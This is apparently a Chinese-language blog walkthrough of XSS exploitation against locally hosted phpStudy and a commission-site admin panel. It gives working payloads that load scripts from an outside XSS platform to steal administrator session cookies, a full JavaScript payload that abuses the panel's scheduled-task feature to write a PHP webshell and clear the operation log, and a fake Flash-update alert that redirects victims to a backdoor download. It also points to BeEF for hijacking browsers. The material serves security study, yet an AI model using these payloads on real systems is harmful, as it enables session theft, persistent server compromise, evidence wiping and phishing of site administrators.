054-Web攻防-XSS平台&复现源码&其他环境等

054-Web攻防-XSS平台&复现源码&其他环境等

知识点

1、XSS跨站-攻击利用-凭据盗取

2、XSS跨站-攻击利用-数据提交

3、XSS跨站-攻击利用-网络钓鱼

4、XSS跨站-攻击利用-溯源综合

漏洞原理:接受输入数据,输出显示数据后解析执行
基础类型:反射(非持续),存储(持续),DOM-BASE

拓展类型:jquery,mxss,uxss,pdfxss,flashxss,上传xss等

常用标签:https://www.freebuf.com/articles/web/340080.html

攻击利用:盲打,COOKIE盗取,凭据窃取,页面劫持,网络钓鱼,权限维持等

安全修复:字符过滤,实例化编码,http_only,CSP防护,WAF拦截等

测试流程:看输出想输入在哪里,更改输入代码看执行(标签,过滤决定)

前情提要

0、XSS跨站-攻击利用-Cookie盗取

条件:无防护Cookie凭据获取

利用:xss平台或手写代码

触发代码

<script src =https://xs.pe/WFb.jpg></script>

简单案例-小皮面板

漏洞环境:小皮面板

xss平台:https://xssaq.com/

漏洞复现:

  • 在本地部署一个小皮面板访问后台管理路径 在用户名上面输入我们payload <sCRiPt sRC=//xs.pe/WFb></sCrIpT>
  • 然后进行几次登录尝试 密码随便只要验证码正确就行
  • 打开另一个浏览器访问小皮后台路径进行登录 访问操作日志可以看到弹窗
  • 返回xss在线平台 点击xss访问记录点击查看即可看到详情信息
  • image-20250523191355865
  • image-20250523190912001
  • image-20250523191318020
  • image-20250523191054930
  • image-20250523191528060

1、XSS跨站-攻击利用-凭据窃取

漏洞环境:骑士财

漏洞复现

  • 本地搭建平台 使用测试账号密码登入
  • 个人中心 设置 这里有个结算信息可以提交我们的payload<sCRiPt sRC=//xs.pe/n0L></sCrIpT>黑盒情况下随便插 返回我们的主页申请提现
  • 登录后台管理页面 查看提现申请 触发xss代码
  • 返回我们的xss平台可以拿到骑士才平台的PHP session 复制
  • 新开一个浏览器访问后台路径 打开f12 选择应用的cookie改为我们盗取的cookie 回车 最后成功登录后台
  • image-20250523195359317
  • image-20250523201143822
  • image-20250523201358025
  • image-20250523201517277
  • image-20250523201640850
  • image-20250523202055311
  • image-20250523202223764

2、XSS跨站-攻击利用-数据提交

条件:熟悉后台业务功能的数据包,利用js写一个模拟提交

利用:凭据获取不到或有防护无法利用凭据进入时执行其他

function poc(){
  $.get('/service/app/tasks.php?type=task_list',{},function(data){
    var id=data.data[0].ID;
    $.post('/service/app/tasks.php?type=exec_task',{
      tid:id
    },function(res2){
        $.post('/service/app/log.php?type=clearlog',{
            
        },function(res3){},"json");
        
      
    },"json");
  },"json");
}
function save(){
  var data=new Object();
  data.task_id="";
  data.title="test";
  data.exec_cycle="1";
  data.week="1";
  data.day="3";
  data.hour="14";
  data.minute = "20";
  data.shell='echo "<?php @eval($_POST[123]);?>" >D:/xp.cn/www/wwwroot/admin/localhost_80/wwwroot/1.php';
  $.post('/service/app/tasks.php?type=save_shell',data,function(res){
    poc();
  },'json');
}
save();

漏洞复现:

  • 在xss在线平台创建完项目后自定义代码 将上面的代码复制进去
  • 登录后台管理路径将payload复制上去 进行登录
  • 打开小皮面板后台查看操作日志 后查看文件 发现创建了1.php文件
  • image-20250524125853923
  • image-20250525151630711
  • image-20250525151614172

3、XSS跨站-攻击利用-网络钓鱼

1.部署可访问的钓鱼页面并修改

2.植入xss代码的后代受害者触发

3.将后门及其正常文件捆绑打包免杀

<script>alert('当前浏览器Flash版本过低,请下载升级!');location.href='http://x.x.x.x/flash'</script>

漏洞复现-Flash钓鱼攻击

  • 本地准备了一个flash钓鱼页面 打开源代码 修改将里面的下载链接修改为后门地址 我这里改为了xss触发平台的链接

  • 依旧是使用骑士财 在个人设置那里进行 将payload插入

  • <script>alert('当前浏览器Flash版本过低,请下载升级!');location.href='http://192.168.162.149:82'</script>

  • 在个人设置中心里面将我的佣金 进行申请结算(如果没有佣金了可以去数据库进行修改 user表里面)

  • 当我们再访问后台的申请提现页面就会出现弹窗 点击确定就会去伪造的flash钓鱼界面

  • 点击立即下载就会访问xss平台的payload

  • image-20250523210229423

  • image-20250523210422832

  • image-20250523211911473

  • image-20250523212006897

  • image-20250523205357151

  • image-20250523212751411

  • image-20250523212911134

  • image-20250523213433045

  • image-20250523213639319

4、XSS跨站-攻击利用-溯源综合

XSS数据平台-XSSReceiver(这是给个人搭建的XSS平台,不想使用网上的XSS平台可以用这个项目)

简单配置即可使用,无需数据库,无需其他组件支持

项目地址:https://github.com/epoch99/BlueLotus_XSSReceiver-master

搭建非常简单,下载源码下来放入phpstudy目录下访问安装即可

详情看这 web安全---XSS利用平台BLUE-LOTUS安装与使用

浏览器控制框架-beef-xss

只需执行JS文件,即可实现对当前浏览器的控制,可配合各类手法利用
缺点:如果对方浏览器关闭,权限就会掉
搭建:beef-xss详细教程(一文带你学会beef) | Kali下安装beef | beef-xss反射型,储存型利用 | beef实现Cookie会话劫持 | 键盘监听 | 浏览器弹窗,重定向等

简单案例

  • 依旧是用骑士财 在个人中心设置里面吗输入我们的payload
  • 去我的佣金里面申请结算
  • 登录管理员后台账号查看
  • 最后返回beef查看在线浏览器
  • 微信图片_20250524102651
  • image-20250524100445874
  • image-20250524101249413
  • image-20250524102634025
  • image-20250524103048213
posted @ 2025-09-19 18:16  0xMouise  阅读(15)  评论(0)    收藏  举报